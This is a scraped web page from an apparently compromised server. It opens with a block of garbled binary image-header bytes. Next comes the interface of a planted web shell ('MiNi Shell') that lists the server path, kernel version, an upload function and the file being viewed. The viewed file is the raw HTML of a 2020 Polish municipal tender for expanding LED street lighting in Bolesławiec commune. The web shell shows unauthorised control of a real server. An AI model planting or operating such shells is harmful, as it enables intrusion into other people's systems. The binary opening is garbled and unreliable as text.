JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20200217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20200217/513311-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 513311-N-2020 z dnia 2020-02-17 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Bolesławiec</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Uzupełnienie oświetlenia drogowego na terenie gminy Bolesławiec</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Bolesławiec</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">23082145700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Teatralna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1 a</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">59-700</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Bolesławiec</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">75 732 32 21, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">urzadgminy@gminaboleslawiec.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">75 735 17 83</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.gminaboleslawiec.pl/354/407/postepowania-powyzej-30-tys-euro.html</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">www.urzadgminyboleslawiec.pl</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.gminaboleslawiec.pl/354/407/postepowania-powyzej-30-tys-euro.html</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.gminaboleslawiec.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć w sekretariacie Urzędu Gminy Bolesławiec.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Teatralna 1a, 59-700 Bolesławiec</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Uzupełnienie oświetlenia drogowego na terenie gminy Bolesławiec</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">I.I.271.03.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiot zamówienia: zadanie obejmuje rozbudowę istniejącego oświetlenia dróg stanowiących mienie gminy Bolesławiec w 12-stu miejscowościach: BOŻEJOWICE, BRZEŹNIK, GOLNICE, KRAŚNIK DOLNY, KRAŚNIK GÓRNY, KRUSZYN, NOWA, NOWA WIEŚ, TRZEBIEŃ, MIERZWIN, TRZEBIEŃ MAŁY i ŻELISZÓW. Opracowanie obejmuje wykonanie rozbudowy i modernizacji istniejącego oświetlenia drogowego w 12 miejscowościach na terenie gminy Bolesławiec. Projektowane latarnie należy wyposażyć w oprawę ledową ze sterownikiem programowym umożliwiającym sterowanie wielkością natężenia oświetlenia. Na nowych punktach świetlnych należy zainstalować oprawy typu ledowego o mocy nie większej niż 57 W i strumieniu świetlnym LED nie mniejszym niż 6850 lumenów o skuteczności świetlnej oprawy nie mniejszej niż 105 lm z 1 W*).*) Skuteczność świetlna opraw, rozumiana, jako strumień świetlny emitowany przez oprawę z uwzględnieniem wszelkich występujących strat do całkowitej energii zużywanej przez oprawę, jako system. Każda z nowych instalowanych opraw musi być wyposażona w urządzenie sterujące natężeniem oświetlenia z ustawieniem fabrycznym na obniżenie natężenia oświetlenia o 50% w godzinach od 2300 do 500 rano.Oprawa musi posiadać certyfikat wydany przez laboratorium badawcze posiadające akredytację na terenie UE - Certyfikat ENEC potwierdzający jej wykonanie według norm europejskim.Dostarczony towar musi pochodzić z legalnego kanału sprzedaży producenta na terenie UE oraz reprezentować modele z bieżącej linii produkcyjnej. Zamawiający nie dopuszcza zaoferowania sprzętu odnawialnego, demonstracyjnego lub powystawowego. Wszystkie oprawy i słupy oświetleniowe muszą pochodzić od tego samego producenta. Wymagania dotyczące oprawy: - Obudowa (korpus) oprawy wykonana jako wysokociśnieniowy odlew aluminiowy malowany proszkowo na wybrany kolor z ogólnodostępnej palety (preferowany szary) z uchwytem montażowym stanowiącym integralną część oprawy i wykonany tej samej technologii. - Klosz - szyba hartowana płaska o udarności min. IK 09.- Konstrukcja oprawy pozwalająca na wymianę układu optycznego oraz modułu zasilającego. Oprawa wyposażona w system optymalnego odprowadzenia ciepła (termiczne rozdzielenie pomiędzy układem zasilającym, a układem optycznym). - Oprawa wyposażona w uniwersalny uchwyt pozwalający na montaż zarówno na wysięgniku jak i bezpośrednio na słupie, a także pozwalający na zmianę kąta nachylenia oprawy w zakresie od 0° do 15° (montaż bezpośredni) lub od 0° do -15° (montaż na wysięgniku), uchwyt posiada dodatkowe zabezpieczenie zapobiegające przypadkowemu obróceniu oprawy na wysięgniku. - Elementy mocujące oprawę na słupie, wysięgniku (śruby, podkładki) muszą być wykonane ze stali nierdzewnej. - Budowa oprawy pozwala na wymianę układu optycznego oraz modułu zasilającego. - Oprawa wyposażona w system optymalnego odprowadzenia ciepła. Oprawa dwukomorowa z termicznym oddzieleniem komory osprzętu elektrycznego od komory optycznej. - Użyte w oprawie panele LED muszą spełniać wymagania normy EN 62471 „Bezpieczeństwo fotobiologiczne lamp i systemów lampowych”. - Napięcie znamionowe oprawy 230V+/- 5%, 50Hz, współczynnik mocy oprawy cos fi>=0,9, - Oprawa powinna posiadać system regulacji ciśnienia wewnątrz oprawy zapobiegający kondensacji pary wodnej, jak i czujnik termiczny zapobiegający przegrzaniu oprawy. -Trwałość źródeł LED nie mniej niż 100 000h, wartość strumienia świetlnego w tym okresie nie może być mniejsza niż 80% strumienia początkowego, - Oprawa musi posiadać zabezpieczenia przed przepięciami o napięciu co najmniej 10 kV. - Szczelność komory optycznej i elektronicznej powinna wynosić IP66.- Temperatura barwowa LED w zakresie 4000K-4500K (neutralny biały) - dopuszczalne różnice +/- 5 % w wymaganym zakresie temperatury barwowej. Wymagany wskaźnik oddawania barw źródeł LED Ra>=70. - Zastosowane materiały do budowy oświetlenia winny odpowiadać pod względem technicznym, użytkowym i eksploatacyjnym materiałom określonym w projekcie technicznym oraz posiadać atesty lub świadectwa jakości. Dokumentacja projektowa obejmuje następujący zakres: Oświetlenie drogowe:1) sieć kablowa YAKY 4×16 mm2 o długości 5.805 m, 2) sieć kablowa YAKY 4x25 mm2 o długości 10 m, 3)	w rurach osłonowych fi 50 – 5.470 m, 4) słup na fundamencie prefabrykowanym stalowy ocynkowany h = 8 m z wysięgnikiem 1 ram - 95 kpl., 5) oprawa oświetleniowa ledowa 57 W - 118 kpl.1. BOŻEJOWICE dz. nr 360Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o dwa punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń nr 5/1 i 5/2 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 5.2. BRZEŹNIK dz. nr 615/29Rozbudowę oświetlenia polegającej na uzupełnieniu oświetlenia o sześć punktów świetlnych na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 116/4.3. GOLNICE dz. nr 266/4 i 409/467Opracowanie obejmuje wykonanie rozbudowy i modernizacji oświetlenia drogi gminnej w Golnicach. Droga gminna dz. nr 266/4: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o jeden punkt świetlny wykonany na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 24/1 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetlenia drogi wojewódzkiej nr 297 słup nr 24.Przejście kabla przez drogę wojewódzką zgodnie z uzgodnieniem DSDiK należy wykonać metodą bezrozkopową na głębokości 1,5 m od nawierzchni jezdni w rurze osłonowej odpornej mechanicznie – przeciskiem lub przewiertem bez naruszenia konstrukcji drogi. Kabel w pasie drogowym drogi wojewódzkiej poza jezdnią układać na głębokości 1,0m z zachowaniem odległości 1,0 m od krawędzi jezdni. Komorę technologiczną dla przecisku lub przewiertu należy wykonać w poboczu z zachowaniem odległości min. 1,0 m od krawędzi jezdni.Droga gminna dz. nr 409/467: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o trzy punkty świetlne nr: 40/1, 40/2, 40/3 na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetlenia drogi wojewódzkiej nr 297 słup nr 40. Przejście kabla przez drogę wojewódzką nr 297 na wysokości słupa nr 40 wykonać w sposób taki jak przy przejściu kabla na wysokości słupa nr 24.4. KRAŚNIK DOLNY dz. nr 773, 811, 985 i 857Opracowanie obejmuje wykonanie rozbudowy i modernizacji oświetlenia drogi gminnej w miejscowości Kraśnik Dolny. Droga gminna dz. nr 773: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5 m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 78/1 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 78. Droga gminna dz. nr 811: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5 m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 62/1 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 62.Droga gminna dz. nr 985: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o trzy punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanych latarń wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 53.Droga gminna dz. nr 857: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o punkt świetlny na słupie wykonanym z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5 m mocowanym na prefabrykowanym fundamencie betonowym. Na słupie należy zbudować oprawę ledową LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupie oświetleniowym od tabliczki bezpiecznikowej do oprawy układać przewód YDY 3 x 1,5mm2 750 V. Zasilanie projektowanej latarni nr 29/1 wykonać kablem YAKXS 4 x 16 mm2 z istniejącego obwodu oświetleniowego słup nr 29.5. KRAŚNIK GÓRNY dz. nr 674 i 209/13Opracowanie obejmuje wykonanie rozbudowy i modernizacji oświetlenia dróg gminnych w Kraśniku Górnym. Droga gminna dz. nr 674: Rozbudowa oświetlenia drogi gminnej polega na uzupełnieniu oświetlenia o cztery punkty świetlne na słupach wykonanych z blachy stalowej profilowanej wysokości 8 m z wysięgnikiem 1-ramiennym 0,5m mocowanych na prefabrykowanych fundamentach betonowych. Na słupach należy zbudować oprawy ledowe LED ED 6850 lm/740 O2 - 57 W ze sterownikiem programowym umożliwiającym obniżenie natężenia oświetlenia do 50% w godzinach od 2300 do 500. W słupach oświetleniowych od tabliczki 